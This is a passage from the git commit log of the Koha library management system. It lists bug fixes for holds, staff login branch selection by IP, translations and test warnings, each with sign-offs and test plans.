6 - Repeat the API and confirm you get the correct patron for the password submitted

Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Kyle M Hall <kyle@bywatersolutions.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months agoBug 36575: Unit tests for checkpw_shib
Tomas Cohen Arazi [Thu, 30 May 2024 16:15:09 +0000 (16:15 +0000)]
Bug 36575: Unit tests for checkpw_shib

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
4 months agoBug 36575: Unit tests for checkpw_ldap
Tomas Cohen Arazi [Thu, 30 May 2024 14:51:11 +0000 (14:51 +0000)]
Bug 36575: Unit tests for checkpw_ldap

Signed-off-by: Tomas Cohen Arazi <tomascohen@theke.io>
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36792: Limit POSIX imports
Janusz Kaczmarek [Mon, 6 May 2024 12:06:22 +0000 (12:06 +0000)]
Bug 36792: Limit POSIX imports

A Marcel's QA patch to Bug 36552 added use POSIX; in two spots.
In https://metacpan.org/pod/POSIX we read:

CAVEATS
Everything is exported by default (with a handful of exceptions). This is
an unfortunate backwards compatibility feature and its use is strongly
discouraged. You should either prevent the exporting (by saying use
POSIX ();, as usual) and then use fully qualified names (e.g.
POSIX::SEEK_END), or give an explicit import list. If you
do neither and opt for the default (as in use POSIX;), you will
import hundreds and hundreds of symbols into your namespace.

This patch fixes this.

No test plan.

Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 8d9ccd6fc371877fbd4d016ee3bc1de54721787e)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit ca023b334cc9b79cfd85e6bb9a75c7037ae1fd95)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 34263: (QA follow-up): Use flatpickr .clear instead
Pedro Amorim [Fri, 3 May 2024 14:22:13 +0000 (14:22 +0000)]
Bug 34263: (QA follow-up): Use flatpickr .clear instead

Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 1137793e44ce6b5d2a4e7759e46218f6ddeb9e8b)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit dcddcda37d1efb586cb75a89df4ad6af0bf438ee)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 34263: Suspending holds consecutively populates previously used date falsely
Katariina Pohto [Thu, 2 May 2024 13:09:39 +0000 (16:09 +0300)]
Bug 34263: Suspending holds consecutively populates previously used date falsely

Suspending a hold doesn't clear the date from the date picker. When another hold is suspended
the previously used date will show on the date picker but the value is not set on the hold.
Suspending the hold will suspend it indefinitely. Also the link "Clear date to suspend indefinitely"
will not clear the date picker. This patch will make both the Suspend button and the Clear date link
clear the dates from both the date picker and the variable passed on, making the suspending consistent
with what is seen on the date picker.

Test plan:
1) Place 3 holds on a patron.
2) Suspend a hold and set a date for it.
3) Suspend a second hold and notice the previously used date is shown on the date picker.
   Note that the hold will be suspended indefinitely.
4) Open the suspending window for the third hold and pick a date. Click "Clear date to suspend indefinitely"
   and note the date picker doesn't get cleared. The hold will be suspended indefinitely.
5) Apply patch.
6) Suspend a hold and set a date for it.
7) Suspend a second hold and notice the date picker does not have a preset date.
8) Pick a date and clear it with the "Clear date to suspend indefinitely link".
   See that the date picker also gets cleared.

Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 0f0479e87aaa324b455fbbf40674f15e2fa862c0)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 44a26cbec7d63d873c0b13cbd8097138431480d0)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36939: Remove a warning from Serials.t
Jonathan Druart [Thu, 23 May 2024 07:50:59 +0000 (09:50 +0200)]
Bug 36939: Remove a warning from Serials.t

t/db_dependent/Serials.t .. 2/57 Use of uninitialized value in numeric gt (>) at /kohadevbox/koha/C4/Serials.pm line 2029.

Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 7d75ec3e2602dcadbb238dfb7cbec76020ebafef)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit f41e7398857cc9f76c0bcdf01e3426c192e773e0)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36923: Remove warnings from Holds/LocalHoldsPriority.t
Jonathan Druart [Wed, 22 May 2024 12:01:28 +0000 (14:01 +0200)]
Bug 36923: Remove warnings from Holds/LocalHoldsPriority.t

t/db_dependent/Holds/LocalHoldsPriority.t .. 1/7 Use of uninitialized value in numeric gt (>) at /kohadevbox/koha/C4/Reserves.pm line 866.
t/db_dependent/Holds/LocalHoldsPriority.t .. 2/7 Use of uninitialized value in numeric gt (>) at /kohadevbox/koha/C4/Reserves.pm line 866.
Use of uninitialized value in numeric gt (>) at /kohadevbox/koha/C4/Reserves.pm line 866.
Use of uninitialized value in numeric gt (>) at /kohadevbox/koha/C4/Reserves.pm line 866.
t/db_dependent/Holds/LocalHoldsPriority.t .. 5/7 Use of uninitialized value in numeric gt (>) at /kohadevbox/koha/C4/Reserves.pm line 866.
t/db_dependent/Holds/LocalHoldsPriority.t .. ok
All tests successful.

We didn't have the default values generated by the DBMS

Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 6827c9061ffc57c2e1f7087aced8ce2e65196558)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 233e92f8996958e66363557daec1859a4f76c93b)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36589: Advanced cataloging - restore the correct height of the clipboard
Phil Ringnalda [Thu, 16 May 2024 20:54:41 +0000 (13:54 -0700)]
Bug 36589: Advanced cataloging - restore the correct height of the clipboard

A simple direct fix for the height of the advanced editor's clipboard,
which is a <select size="10"> that's currently cut down to the height of
one thick line by CSS intended for non-multiple, non-sized selects with
dropdown menus.

Test plan:
1. Set the pref EnableAdvancedCatalogingEditor to Enable
2. Cataloging -> Advanced editor
3. Note the Clipboard is a single line tall
4. Apply patch, shift+reload Advanced editor
5. Note the Clipboard is ten lines tall

Signed-off-by: Owen Leonard <oleonard@myacpl.org>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 10a8dc5108dc58d91786ead95f5130a7a147d5b1)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 0413d06b0e0f9e2bb8ec3bf26a55d445a7df7119)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36943: (follow-up) 24.05.00 - Update .mailmap
Katrin Fischer [Thu, 23 May 2024 17:11:33 +0000 (17:11 +0000)]
Bug 36943: (follow-up) 24.05.00 - Update .mailmap

Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit f044310808bd26fb856ed26e78290f972889a9cc)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 57ec82f6e86a230a6ace571e7c5e54e8ddf702fc)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36943: 24.05.00 - Update .mailmap
Martin Renvoize [Thu, 23 May 2024 10:47:05 +0000 (11:47 +0100)]
Bug 36943: 24.05.00 - Update .mailmap

Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit d8863160da07c81b0b7356c8b923737b401db481)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 6c89d4eeb6348683d32a1928a2e410e3f81c44fe)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36908: (Rmaint follow-up) Fix number of tests
Lucas Gass [Fri, 31 May 2024 15:27:24 +0000 (15:27 +0000)]
Bug 36908: (Rmaint follow-up) Fix number of tests

Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36908: (QA follow-up) Proposed improvement to prefernce description
Martin Renvoize [Thu, 23 May 2024 09:36:55 +0000 (10:36 +0100)]
Bug 36908: (QA follow-up) Proposed improvement to prefernce description

I found the initial addition of 'or the branch chosen at login' to the
system preference description more misleading than the original. After
discussion on mattermost and with training staff here at PTFS the best
alternative we could come up with is proposed here.

Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Nick Clemens <nick@bywatersolutions.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 85735e86f4f927d8e455aec08ef90a1381694059)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit b478d91b59a11574b0fd7689b5037c2c29ee8d42)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36908: Sort branches based on branchcode
Nick Clemens [Tue, 21 May 2024 12:44:25 +0000 (12:44 +0000)]
Bug 36908: Sort branches based on branchcode

This adds a sort based on branchcode, it's a fallback for an edge case that should be rare
so I think is acceptable, as long as documented.

I added test coverage, but it may no longer be possible to encounter this scenario.

System preference descriptions are updated as well.

Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 46cecfdd72ee45bfad03c6875fdc078df48eabec)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 7682763fca0e1d14c27a32e9987e8c66712229cb)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36908: Additional unit tests to identify flaw when two branches have same IP
Nick Clemens [Tue, 21 May 2024 12:26:34 +0000 (12:26 +0000)]
Bug 36908: Additional unit tests to identify flaw when two branches have same IP

This could be considered a configuration flaw, but when:
StaffLoginBranchBasedOnIP enabled and not AutoLocation
or
AutoLocation enabledand no IP set in user's branch

AND

two branches have the same IP set

the user can be logged in randomly to one of the matching branches.

These test often pass, but will also randomly fail

Easier to verify with a one liner demonstrating current code:
perl -e 'use Koha::Libraries; use List::MoreUtils qw(uniq); my $branches = { map { $_->branchcode => $_->unblessed } Koha::Libraries->search->as_list }; my $branchcode="CPL"; warn Data::Dumper::Dumper( uniq( $branchcode, keys %$branches ));'

Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 7e8803537254ec950c64327bece8091e6cf49499)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit aa1c4c0281039749fa024687049b32b375d78ec6)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36908: Expand, clarify, and tidy tests for AutoLocation
Nick Clemens [Tue, 21 May 2024 12:14:50 +0000 (12:14 +0000)]
Bug 36908: Expand, clarify, and tidy tests for AutoLocation

Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 6966fcc398d3a87edba95aa987d915a1b00eb08f)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 15bf32a50a9c4cfff9e7b8b139f7fb639e90b331)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36924: Remove warning "Value not allowed for auto_incr itemnumber in Item"
Jonathan Druart [Thu, 23 May 2024 06:49:39 +0000 (08:49 +0200)]
Bug 36924: Remove warning "Value not allowed for auto_incr itemnumber in Item"

We are removing entirely the badly written test.

Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Note: We cannot test this properly when the search index refers to biblios
and items that do not exist in the database.
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 12511385289b41c3c3d067f1b7c4397010e3d27c)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 98fa5f6b25360e056dac72a776e880ec2c4d4970)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36924: Remove "I don't know what to say" warnings
Jonathan Druart [Wed, 22 May 2024 12:05:45 +0000 (14:05 +0200)]
Bug 36924: Remove "I don't know what to say" warnings

Those are a pain really

Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit a77d74b903951af569e73e09c5c9c33f0e6aa818)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 78d1f934c2ad5088bde0bd199c47a2627ad09f8e)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36665: (RMaint follow-up) adapt unit test
Fridolin Somers [Wed, 29 May 2024 14:40:41 +0000 (16:40 +0200)]
Bug 36665: (RMaint follow-up) adapt unit test

(cherry picked from commit 8ddb0797f66168765c80df8372a588e1885ff21c)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36665: (follow-up) Default preference to enabled
Nick Clemens [Thu, 23 May 2024 15:14:51 +0000 (15:14 +0000)]
Bug 36665: (follow-up) Default preference to enabled

While this is a new preference, this was the standard behavior for a long time. I think we should
default to enabled to restore previous behavior.

Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit e48e3d02f301ecf9402812120ca333c91d84d5c5)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit a479192e6745e6f452c0f2b08ce0ff473f19135c)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36665: DBRev 23.05.11.002
Lucas Gass [Fri, 31 May 2024 13:51:49 +0000 (13:51 +0000)]
Bug 36665: DBRev 23.05.11.002

Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36665: (follow-up) Rephrase system preference description
Katrin Fischer [Wed, 22 May 2024 14:14:32 +0000 (14:14 +0000)]
Bug 36665: (follow-up) Rephrase system preference description

... and replace some branches with libraries.

Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 0d4ee5319875439d2309bfae5d7f0054d2d02194)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit a6b9845ecf127768729a40ddb3872141adde6522)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36665: (follow-up) Allow choosing a branch with no IP when using AutoLocation
Nick Clemens [Wed, 22 May 2024 13:08:43 +0000 (13:08 +0000)]
Bug 36665: (follow-up) Allow choosing a branch with no IP when using AutoLocation

Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 58a75cafd6934f2a1b938aac12493bdb7bb53724)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 190fc91e2980c94b3c2540aae0e668fd66e551f6)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36665: (follow-up) Wrap code block in type ne 'opac' conditional
Nick Clemens [Tue, 21 May 2024 11:19:14 +0000 (11:19 +0000)]
Bug 36665: (follow-up) Wrap code block in type ne 'opac' conditional

Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit fb45438ae3a95586107fdf34e03a6803714b25de)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 031896d58bffda13bc24c33515e0711814dba725)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36665: Add option to set the staff user's logged in branch based on their current ip
Nick Clemens [Fri, 17 May 2024 11:59:21 +0000 (11:59 +0000)]
Bug 36665: Add option to set the staff user's logged in branch based on their current ip

This patch adds a new system preference StaffLoginBranchBasedOnIP which restores the behaviour before bug 35918
of using the current IP to determine the user's logged in branchcode

To test:
 1 - Get your current ip
 2 - Set that IP for a library in the administration section
 3 - Find a user account assigned to a different library that can login to staff side
 4 - Login to staff as that user, select 'My library'
 5 - You are logged in to the user's branch
 6 - Apply patch, restart all
 7 - Log out and back in, selecting 'My library'
 8 - You are logged in to the user's branch
 9 - Enable new system preference StaffLoginBranchBasedOnIP
 9 - Log out and back in, selecting a different branch, noting the new warning below the library selection
10 - You are logged in to the branch with the matching IP
11 - Log out and back in, selecting 'My library'
10 - You are logged in to the branch with the matching IP
11 - Change your logged in branch
12 - Verify the selection sticks and you can perform staff actions in the chosen branch
13 - Change the IP of the library to one that doesn't match yours
14 - Verify you can log out and log back in and that selected branch is respected when your IP doesn't match library IP

Signed-off-by: Kristi Krueger <KKRUEGER@cuyahogalibrary.org>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 3a0d6f5d07b914ab03f9ae3c56b033158bd91130)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 6f4632ef04365436079a78b3b0e23bd34536d972)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36858: Remove warnings
Jonathan Druart [Wed, 22 May 2024 07:24:06 +0000 (09:24 +0200)]
Bug 36858: Remove warnings

Argument "" isn't numeric in int

Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 678e3f6e208ed47820132215806519f5162545fb)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 4c4349dbdb1ce156320909d5f9527d2206a80c9e)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36858: Check page parameter for virtual shelves
Marcel de Rooy [Tue, 21 May 2024 14:20:18 +0000 (14:20 +0000)]
Bug 36858: Check page parameter for virtual shelves

Test plan:
Try passing page=x now and verify different behavior (no 500).

Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: David Nind <david@davidnind.com>
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 90f011355735d16af8cdf6ef224ccf8074ad94e1)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit d903ffd4e61689ddcac0f4cd046d2b9f800859f3)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36914: Remove DBIC warning in shelves.pl
Jonathan Druart [Wed, 22 May 2024 07:35:55 +0000 (09:35 +0200)]
Bug 36914: Remove DBIC warning in shelves.pl

Same fix as Bug 28561: Remove DBIC warning in opac-shelves
But for staff

Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit f388b99af044be538b62c9e850e341cad064ab95)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 509fd15d26a7c84563c73c12538aea54ee7c078e)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 35929: Remove extra parenthesis
Jonathan Druart [Wed, 22 May 2024 07:52:04 +0000 (09:52 +0200)]
Bug 35929: Remove extra parenthesis

and make it more readable

Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit ad41c672a13f8e18ea2fbbc4ad3245165693c339)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit ae53cf4eea2fb401bae6fad487b779002aa05789)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 35929: Don't record a change for empty fields submitted in patron form
Nick Clemens [Wed, 1 May 2024 18:19:42 +0000 (18:19 +0000)]
Bug 35929: Don't record a change for empty fields submitted in patron form

This is reminiscent of bug 36159 - when a field is submitted as empty, and null in the DB
we need to reject this as a change. I tried to copy the logic from that bug, as well as
deleting submitted changes for hidden fields (from html manipulation)

This should be tested extensively. One note: If you submit a valid change request, then submit a second with no change the second will be ignored, but the first will remain. i.e. if you change your name from 'Nick' to 'Nack' - then realize your typo you cannot submit a new request to change it back untl the initial request is cleared

To test:
1 - Play with PatronSelfModificationBorrowerUnwantedField and PatronSelfModificationMandatory field to have some fields set
2 - Add a patron attribute, or several, that are editable in the OPAC
3 - Try submitting a form with no changes, note a modification requets is submitted
4 - Approve the request
5 - Apply patch, restart all
6 - Try submitted a blank request, you are notified there were no changes
7 - Try to force an unwanted field via html modification
8 - No changes reported
9 - Confirm attributes changes are successful
10 - After a successful request, try submitting a blank request
11 - Note no changes are recorded, but the initial request is still active

Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
Signed-off-by: Jonathan Druart <jonathan.druart@bugs.koha-community.org>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit cf4a3667cbeb4dbb6b7dd74fd30a3cacca540603)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 1a898d94649f13e76e094c14ad41395f2bd19c9a)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36845: Do not loop over the content attribute
Jonathan Druart [Mon, 20 May 2024 11:34:24 +0000 (13:34 +0200)]
Bug 36845: Do not loop over the content attribute

We skip it.

Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 68e317bd0f8daf967a8af540056e8637524e5d3b)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit aed7e0849634a70880fa09029d018cd053cd9fac)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36845: Exclude meta tag from the translations
Jonathan Druart [Tue, 14 May 2024 07:29:02 +0000 (09:29 +0200)]
Bug 36845: Exclude meta tag from the translations

This bug originaly wants to get rid of "noindex" coming from this meta
tag:
  <meta name="robots" content="noindex">

But actually we have other strings from the meta tags that should not be
translated.

Test plan:
0. Do not apply this patch
1. cd misc/translator/po && gulp po:update --lang es-ES (or any other
   lang)
2. git commit -a -m"wip"
3. Apply this patch
4. Repeat 1 and git diff to show the diff
Notice that strings that should not be translated are removed from the
po files (actually commented)

Signed-off-by: Caroline Cyr La Rose <caroline.cyr-la-rose@inlibro.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit fbb123b12eab123e62c508944fd2b6261fb24acf)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit b3dfb82bd030aefb2299fd6e00d31588dbdcffb4)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36892: Fix label for 'is_standing' input
Thibaud Guillot [Fri, 17 May 2024 09:13:21 +0000 (11:13 +0200)]
Bug 36892: Fix label for 'is_standing' input

Test plan:

1) Go to acqui/histsearch.pl and look for "search_children_too" with
   dev tools console.
2) On 'is_standing' input, the same label is used
3) Apply this patch and reload it
4) Now it's correct

Sponsored by: BibLibre

Signed-off-by: Owen Leonard <oleonard@myacpl.org>
Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 40900343673c280d092de9c57399a77c113b41ba)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit dacd7fabbe318ad3c340dd5cc1d35b2e67c040d8)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36856: Fix MARC subfield name in new order from existing bibliographic record
Fridolin Somers [Tue, 14 May 2024 09:41:57 +0000 (11:41 +0200)]
Bug 36856: Fix MARC subfield name in new order from existing bibliographic record

In form of the bibliographic details when adding an order 'From an existing record' in a basket, the marc subfield name is not shown.
The template calls [% field.lib | html %] but this comes from Koha::UI::Form::Builder::Biblio generate_subfield_form() which gives 'marc_lib'.

Test plan:
1) Be sure to have an ACQ biblio framework
2) Enable system preference UseACQFrameworkForBiblioRecords
3) Go to an acquisition basket
4) Add a term in 'From an existing record' and submit
5) On first result click on 'Add order'
6) Look at 'Catalog details'
=> Without patch you only see subfield tag and letter : (123a)
=> With patch you also see subfield name : Name (123a)

Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
Signed-off-by: Pedro Amorim <pedro.amorim@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 5080eecc2268c2b7b88856800e728041c2fc29ec)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 33370ea55b34b234d8d0f05e84dd03dc5d4313aa)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36834: (Bug 29697 follow-up) Koha explodes when trying to open in Labeled MARC...
Janusz Kaczmarek [Sat, 11 May 2024 08:41:04 +0000 (08:41 +0000)]
Bug 36834: (Bug 29697 follow-up) Koha explodes when trying to open in Labeled MARC view a bibliographic record with an invalid biblionumber

After changes made in catalogue/labeledMARCdetail.pl with the bug 29697
when trying to open the Labeled MARC view with
biblionumber=<invalid_number> (e.g. a deleted biblionumber) Koha explodes
with a message << Can't call method "metadata" on an undefined value at
/kohadevbox/koha/catalogue/labeledMARCdetail.pl line 59 >>

Test plan:
==========
1. Activate the viewLabeledMARC syspref.
2. Try to open a biblio record in Labeled MARC view, giving as a biblionumber
   (in URL) a non-existing biblionumber, e.g. in ktd, with standard ktd
   test data:
   http://your_ktd:8081/cgi-bin/koha/catalogue/labeledMARCdetail.pl?biblionumber=1234567
   Koha should explode with the message:
   Can't call method "metadata" on an undefined value at
   /kohadevbox/koha/catalogue/labeledMARCdetail.pl line 59
3. Apply the patch; restart_all.
4. Repeat p. 2.  You should get a regular page with the info "The record you
   requested does not exist (1234567)".

Signed-off-by: Roman Dolny <roman.dolny@jezuici.pl>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit e4e54af0e77a01d8ad1ee6ac84f5b255951f1831)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 944f3ffc8f0f59b2080d0670f4691a2343413e50)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36872: Untranslatable strings in request.tt
Owen Leonard [Thu, 16 May 2024 12:52:04 +0000 (12:52 +0000)]
Bug 36872: Untranslatable strings in request.tt

There are errors in the JavaScript in the holds template in the staff
client which results in strings not being translatable. This patch
corrects the errors.

To test, apply the patch and run through the process of placing a hold
on multiple items in the staff interface.

- At the hold confirmation step, try to submit the form without
  selecting pickup locations for one or more titles.
- You should get an alert, "Please make sure all selected titles have a
  pickup location set".
- Uncheck the checkboxes next to each title you're placing a hold on.
- Submit the form. You should get an error: "Please select at least one
  title".

- Test the translation process with a language, e.g. fr-FR:
- In KTD, run: gulp po:update --lang fr-FR
- Check fr-FR-staff-prog.po for the line referring to
  koha-tmpl/intranet-tmpl/prog/en/modules/reserve/request.tt:1499
- You should see the string "Please make sure all selected titles have a
  pickup location set".

Signed-off-by: Caroline Cyr La Rose <caroline.cyr-la-rose@inlibro.com>
Signed-off-by: Marcel de Rooy <m.de.rooy@rijksmuseum.nl>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
(cherry picked from commit 537c960777f94cf964c757ed2773f330612ae3c7)
Signed-off-by: Fridolin Somers <fridolin.somers@biblibre.com>
(cherry picked from commit 4a51f8ca4ae772d5b3f9f06605aa72980ef49a19)
Signed-off-by: Lucas Gass <lucas@bywatersolutions.com>
5 months agoBug 36529: manage_additional_fields permission for more than acquisitions and serials
Caroline Cyr La Rose [Fri, 12 Apr 2024 09:53:25 +0000 (05:53 -0400)]
Bug 36529: manage_additional_fields permission for more than acquisitions and serials

This patch renames the manage_additional_fields permission to remove
the specificity of acquisitions orders and serial subscriptions.
Since each additional field requires a corresponding permission, I
wrote each of them next to it. It makes it very long, but right now
there isn't really a way to link permissions other than the permission
description.

To test:
1. Apply patch
2. Go to a patron account
3. Click More > Set permissions
